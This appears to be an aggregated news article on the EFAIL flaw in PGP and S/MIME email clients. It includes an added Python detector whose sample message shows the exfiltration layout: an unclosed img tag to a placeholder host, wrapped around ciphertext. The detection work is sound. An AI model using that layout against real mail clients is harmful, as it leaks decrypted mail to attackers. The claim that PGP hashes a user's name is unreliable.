Security researchers discover critical flaw in PGP encryption that reveals plaintext

PSA: PGP and S/MIME are broken and leaking encrypted emails – stop using them right now

Uninstall PGP: EFF warns of exploit that may reveal plaintext of encrypted emails

German researchers have found a major vulnerability in PGP (Pretty Good Privacy), a popular email encryption program, which could reveal past and present encrypted emails. The vulnerabilities, dubbed EFAIL, were first mentioned by the EFF on Sunday. The Foundation, which has been in communication with the researchers, has advised users to "temporarily stop sending and especially reading PGP-encrypted email".

Sebastian Schinzel, one of the researchers, promised in a Tweet to provide more details of the vulnerabilities on May 15.

The researchers meant to hold off on full publication until Tuesday, May 15, though the white paper was published earlier due to the embargo being broken.

"They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past", researchers said.

Essentially, the attacker sends a message made of three parts: a partial HTML img tag declaration, the previously captured encrypted text, and the closing HTML for the image tag.

EFAIL includes two different types of attack. In either case, the attacker must first obtain an encrypted message and then get its sender or one of its recipients to open a new, attacker-sent email.
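As an added, defender-side example (not code from the article or from the EFAIL researchers): a Python check that flags the three-part layout described above, an HTML part that leaves a tag open immediately before an encrypted part. The sample message is constructed for this example and the host name in it is a placeholder.

```python
import email
import re
from email import policy

# Constructed sample (not a real capture): an HTML part whose <img src=" is left
# open, an encrypted part, then an HTML part that closes the tag. A client that
# renders all three together would turn the decrypted text into part of the URL.
SAMPLE = (
    "From: sender@example.test\r\n"
    "To: victim@example.test\r\n"
    "Subject: constructed EFAIL-style sample\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="BOUND"\r\n'
    "\r\n"
    "--BOUND\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<img src="https://collector.invalid/\r\n'      # placeholder host
    "--BOUND\r\n"
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "-----BEGIN PGP MESSAGE-----\r\n"
    "(placeholder ciphertext lines)\r\n"
    "-----END PGP MESSAGE-----\r\n"
    "--BOUND\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '">\r\n'
    "--BOUND--\r\n"
)

UNCLOSED_TAG = re.compile(r"<\w[^>]*$", re.S)   # a tag opened but never closed
PGP_ARMOR = b"-----BEGIN PGP MESSAGE-----"

def is_encrypted_part(part):
    """Leaf part carrying an OpenPGP or S/MIME ciphertext."""
    if part.get_content_type() in ("application/pgp-encrypted", "application/pkcs7-mime"):
        return True
    return PGP_ARMOR in (part.get_payload(decode=True) or b"")

def efail_indicators(raw_message):
    """Indices of HTML leaf parts that leave a tag open right before an encrypted part."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    hits = []
    for i, part in enumerate(leaves[:-1]):
        if part.get_content_type() != "text/html":
            continue
        html = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        if UNCLOSED_TAG.search(html.strip()) and is_encrypted_part(leaves[i + 1]):
            hits.append(i)
    return hits

def handling_decision(raw_message):
    """Flagged messages should be decrypted outside the client or with HTML rendering off."""
    return "suspicious" if efail_indicators(raw_message) else "ok"
```

Run `handling_decision(SAMPLE)` to see the constructed message flagged; a message with no encrypted part, or with well-formed HTML, returns "ok".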


Werner Koch of GnuPG, a popular provider of GPG encryption, said the vulnerability was not in the encryption protocols, but rather, in the email clients used to decrypt them. "The attack has a large surface, since for each encrypted email sent to n recipients, there are n + 1 mail clients that are susceptible to our attack", the abstract of the research paper reads.

EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.

The EFAIL report lists additional steps users can take to reduce the likelihood of falling prey to these attacks - namely, decrypting S/MIME and PGP messages outside the email client in a separate application, and disabling HTML rendering altogether.

PGP, for example, works using an algorithm to generate a "hash", or mathematical summary, of a user's name and other information.

In the longer term they said patches for email client plugins and changes to OpenPGP and S/MIME could prevent any problems. The developer of NeoPG noted on Twitter that "The OpenPGP working group at the IETF, which was on the way to address some of the issues, was closed in November due to lack of progress".
